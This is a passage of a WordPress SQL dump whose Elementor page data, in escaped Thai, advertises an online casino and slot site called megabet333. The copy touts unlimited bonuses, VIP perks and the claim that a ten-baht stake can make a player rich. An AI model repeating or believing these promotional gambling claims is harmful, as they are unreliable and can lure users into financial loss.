\\u0e02\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e21\\u0e32\\u0e40\\u0e2a\\u0e34\\u0e23\\u0e4c\\u0e1f\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e25\\u0e34\\u0e21\\u0e34\\u0e15 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e41\\u0e23\\u0e01\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e38\\u0e49\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e01\\u0e14\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e23\\u0e35\\u0e22\\u0e25\\u0e44\\u0e17\\u0e21\\u0e4c\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e01\\u0e47\\u0e21\\u0e35\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e2d\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e2b\\u0e23\\u0e48 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e35\\u0e48\\u0e23\\u0e2d\\u0e1a \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e43\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e14\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e25\\u0e31\\u0e27\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e16\\u0e39\\u0e01\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e22\\u0e2d\\u0e14 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e38\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e33\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e15\\u0e49\\u0e2d\\u0e19\\u0e23\\u0e31\\u0e1a \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1d\\u0e32\\u0e01\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e23\\u0e27\\u0e21\\u0e16\\u0e36\\u0e07\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e43\\u0e19\\u0e40\\u0e17\\u0e28\\u0e01\\u0e32\\u0e25\\u0e15\\u0e48\\u0e32\\u0e07 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e22\\u0e34\\u0e48\\u0e07\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e23\\u0e35\\u0e40\\u0e21\\u0e35\\u0e22\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19\\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13\\u0e21\\u0e35\\u0e04\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e14\\u0e39\\u0e41\\u0e25\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e41\\u0e1a\\u0e1a VIP \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e40\\u0e2b\\u0e27\\u0e35\\u0e48\\u0e22\\u0e07\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e19\\u0e2d\\u0e32\\u0e08\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e32\\u0e01 \\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e01\\u0e47\\u0e08\\u0e30\\u0e2a\\u0e39\\u0e07\\u0e02\\u0e36\\u0e49\\u0e19\\u0e15\\u0e32\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e30\\u0e41\\u0e19\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e17\\u0e38\\u0e01\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e08\\u0e30\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e08\\u0e49\\u0e32\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e17\\u0e35\\u0e48\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e15\\u0e31\\u0e27 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e23\\u0e32\\u0e22\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e2a\\u0e38\\u0e14\\u0e40\\u0e2d\\u0e47\\u0e01\\u0e0b\\u0e4c\\u0e04\\u0e25\\u0e39\\u0e0b\\u0e35\\u0e1f\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e41\\u0e0a\\u0e17\\u0e2a\\u0e14\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a Line Official \\u0e41\\u0e25\\u0e30\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e41\\u0e2d\\u0e1b\\u0e1e\\u0e25\\u0e34\\u0e40\\u0e04\\u0e0a\\u0e31\\u0e19 \\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e15\\u0e2d\\u0e1a\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e27\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e33\\u0e27\\u0e48\\u0e32\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e17\\u0e34\\u0e49\\u0e07\\u0e44\\u0e27\\u0e49 \\u0e41\\u0e21\\u0e49\\u0e41\\u0e15\\u0e48\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e22\\u0e31\\u0e07\\u0e44\\u0e21\\u0e48\\u0e04\\u0e38\\u0e49\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e47\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e07\\u0e27\\u0e25 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e41\\u0e19\\u0e30\\u0e19\\u0e33\\u0e17\\u0e38\\u0e01\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e07\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 3 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e19\\u0e48\\u0e32\\u0e25\\u0e2d\\u0e07 \\u0e01\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e04\\u0e48\\u0e2a\\u0e34\\u0e1a\\u0e1a\\u0e32\\u0e17\\u0e01\\u0e47\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e23\\u0e32\\u0e22\\u0e44\\u0e14\\u0e49\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e22\\u0e32\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e17\\u0e35\\u0e48\\u0e04\\u0e34\\u0e14 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e32\\u0e21\\u0e35\\u0e1e\\u0e31\\u0e19\\u0e18\\u0e21\\u0e34\\u0e15\\u0e23\\u0e17\\u0e35\\u0e48\\u0e08\\u0e30\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e48\\u0e32\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e40\\u0e01\\u0e21\\u0e15\\u0e48\\u0e32\\u0e07 \\u0e46 \\u0e01\\u0e48\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e19\\u0e33\\u0e40\\u0e2a\\u0e19\\u0e2d\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e07\\u0e34\\u0e19\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e14\\u0e49\\u0e27\\u0e22 \\u0e42\\u0e14\\u0e22\\u0e21\\u0e35 3 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e35\\u0e48\\u0e19\\u0e48\\u0e32\\u0e25\\u0e38\\u0e49\\u0e19\\u0e14\\u0e31\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b\\u0e19\\u0e35\\u0e49 <\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1106,140,'_thumbnail_id','60'),(1107,140,'_elementor_edit_mode','builder'),(1108,140,'_elementor_template_type','wp-page'),(1109,140,'_elementor_version','3.32.5'),(1110,140,'_elementor_pro_version','3.32.3'),(1111,140,'_wp_page_template','default'),(1112,140,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(1113,140,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/search_megabet_333_-_Megabet333-Biz.webp\",\"id\":60,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/79_Get_200_-_Megabet333-Biz.webp\",\"id\":53,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e23\\u0e30\\u0e1a\\u0e1a VIP \\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e04\\u0e48\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e43\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e19 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e41\\u0e17\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e01\\u0e23\\u0e14\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e14\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19 